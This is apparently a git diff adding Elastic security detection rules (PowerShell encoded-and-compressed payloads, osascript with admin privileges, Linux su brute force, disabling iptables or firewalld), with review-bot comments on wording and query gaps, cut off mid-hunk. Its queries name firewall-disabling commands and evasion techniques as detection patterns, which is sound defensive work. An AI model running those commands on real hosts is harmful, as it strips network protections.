@@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of .NET functionality for decompression and base64 decoding combined in PowerShell scripts, which malware and security tools heavily use to deobfuscate payloads and load them directly in memory to bypass defenses.", + "false_positives": [ + "Legitimate PowerShell Scripts which makes use of compression and encoding." + ], + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\Downloads\\\\*" + } + } + } + } + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Suspicious Payload Encoded and Compressed", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, 
name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. 
As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n ) and\n not user.id : \"S-1-5-18\"\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": 
"TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 211 + }, + "id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a_211", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_107.json b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_107.json new file mode 100644 index 00000000000..87cf984afab --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_107.json 
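Review bot: The investigation guide in `note` closes its account-compromise step with `to the target host after the registry modification`, but this rule triggers on PowerShell script block content, not on a registry change, so the sentence reads as carried over from another guide; `to the target host after the suspicious script execution` would match what the rule actually detects. Separately, `required_fields` no longer lists `file.path` even though the new `filters` wildcard still reads that field; if the list is generated from the KQL `query` alone this is expected, otherwise the entry should be kept so the mapping remains a stated requirement. The same guide sentence appears in the preceding `_111` hunk, whose start lies outside this view.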
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution of the Apple script interpreter (osascript) without a password prompt and with administrator privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Apple Scripting Execution with Administrator Privileges", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name : \"osascript\" and\n process.command_line : \"osascript*with administrator privileges\"\n", + "references": [ + "https://discussions.apple.com/thread/2266150" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "827f8d8f-4117-4ae4-b551-f56d54b9da6b", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "827f8d8f-4117-4ae4-b551-f56d54b9da6b_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_5.json b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_5.json new file mode 100644 index 00000000000..7e22c207d10 --- /dev/null 
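Review bot: The `description` states the rule identifies osascript execution `without a password prompt`, but the `query` matches any `process.command_line : "osascript*with administrator privileges"`, and an AppleScript `with administrator privileges` call normally does prompt the user unless credentials are given inline, so the description overstates what is detected. Either reword it to `Identifies execution of the Apple script interpreter (osascript) with administrator privileges.` or, if the no-prompt case is the real intent, the query would need to match that form explicitly rather than the bare phrase. The rule also carries no `note` investigation guide, unlike the PowerShell rule earlier in this change; a short triage section (expected admin tooling, parent process, invoking user) would help analysts tune it.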
+++ b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_5.json 
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple consecutive login attempts executed by one process targeting a local linux user account within a short time interval. Adversaries might brute force login attempts across different users with a default wordlist or a set of customly crafted passwords in an attempt to gain access to these accounts.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Local Account Brute Force Detected", + "query": "sequence by host.id, process.parent.executable, user.id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name == \"su\" and \n not process.parent.name in (\n \"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"clickhouse-server\", \"ma\", \"gitlab-runner\",\n \"updatedb.findutils\", \"cron\"\n )\n ] with runs=10\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "835c0622-114e-40b5-a346-f843ea5d01f1", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "835c0622-114e-40b5-a346-f843ea5d01f1_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_6.json b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_6.json new file mode 100644 index 00000000000..6361bcece18 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_6.json 
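Review bot: The `setup` text links the agent-policy guide at a pinned path, `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, whereas the other links in the same string and the macOS rule earlier in this change use `.../fleet/current/...`; a pinned minor version goes stale and should read `https://www.elastic.co/guide/en/fleet/current/agent-policy.html`. The same pinned link appears in the `835c0622-114e-40b5-a346-f843ea5d01f1_6.json` and `83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_6.json` hunks below, and presumably in the `_7` hunk whose setup text runs past this view. Two small wording fixes in `description`: `local linux user account` → `local Linux user account` and `customly crafted passwords` → `custom-crafted passwords`.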
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple consecutive login attempts executed by one process targeting a local linux user account within a short time interval. Adversaries might brute force login attempts across different users with a default wordlist or a set of customly crafted passwords in an attempt to gain access to these accounts.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Local Account Brute Force Detected", + "query": "sequence by host.id, process.parent.executable, user.id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name == \"su\" and \n not process.parent.name in (\n \"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"clickhouse-server\", \"ma\", \"gitlab-runner\",\n \"updatedb.findutils\", \"cron\"\n )\n ] with runs=10\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "835c0622-114e-40b5-a346-f843ea5d01f1", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "835c0622-114e-40b5-a346-f843ea5d01f1_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_6.json b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_6.json new file mode 100644 index 00000000000..73ffce73fdc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_6.json 
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may attempt to disable the iptables or firewall service in an attempt to affect how a host is allowed to receive or send network traffic.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Attempt to Disable IPTables or Firewall", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\n (\n /* disable FW */\n (\n (process.name == \"ufw\" and process.args == \"disable\") or\n (process.name == \"iptables\" and process.args == \"-F\" and process.args_count == 2)\n ) or\n\n /* stop FW service */\n (\n ((process.name == \"service\" and process.args == \"stop\") or\n (process.name == \"chkconfig\" and process.args == \"off\") or\n (process.name == \"systemctl\" and process.args in (\"disable\", \"stop\", \"kill\"))) and\n process.args in (\"firewalld\", \"ip6tables\", \"iptables\")\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_7.json b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_7.json new file mode 100644 index 00000000000..c4e11744787 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_7.json 
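Review bot: The `/* disable FW */` branch of the `query` only matches `process.name == "iptables"` with `-F`, while the `/* stop FW service */` branch already treats `ip6tables` as a firewall service; a flush of the IPv6 ruleset is the same defensive-evasion action and is not covered, so `process.name in ("iptables", "ip6tables")` in the first branch would make the two halves consistent. The `process.args_count == 2` guard restricts the match to a bare flush, which deserves a short EQL comment such as `/* bare table flush only; chain-specific flushes are excluded */` so the exclusion reads as deliberate. The `description` could also name what the query checks, e.g. `disable the iptables, ip6tables or firewalld service`, instead of the looser `the iptables or firewall service`.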
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may attempt to disable the iptables or firewall service in an attempt to affect how a host is allowed to receive or send network traffic.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Attempt to Disable IPTables or Firewall", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\n (\n /* disable FW */\n (\n (process.name == \"ufw\" and process.args == \"disable\") or\n (process.name == \"iptables\" and process.args == \"-F\" and process.args_count == 2)\n ) or\n\n /* stop FW service */\n (\n ((process.name == \"service\" and process.args == \"stop\") or\n (process.name == \"chkconfig\" and process.args == \"off\") or\n (process.name == \"systemctl\" and process.args in (\"disable\", \"stop\", \"kill\"))) and\n process.args in (\"firewalld\", \"ip6tables\", \"iptables\")\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
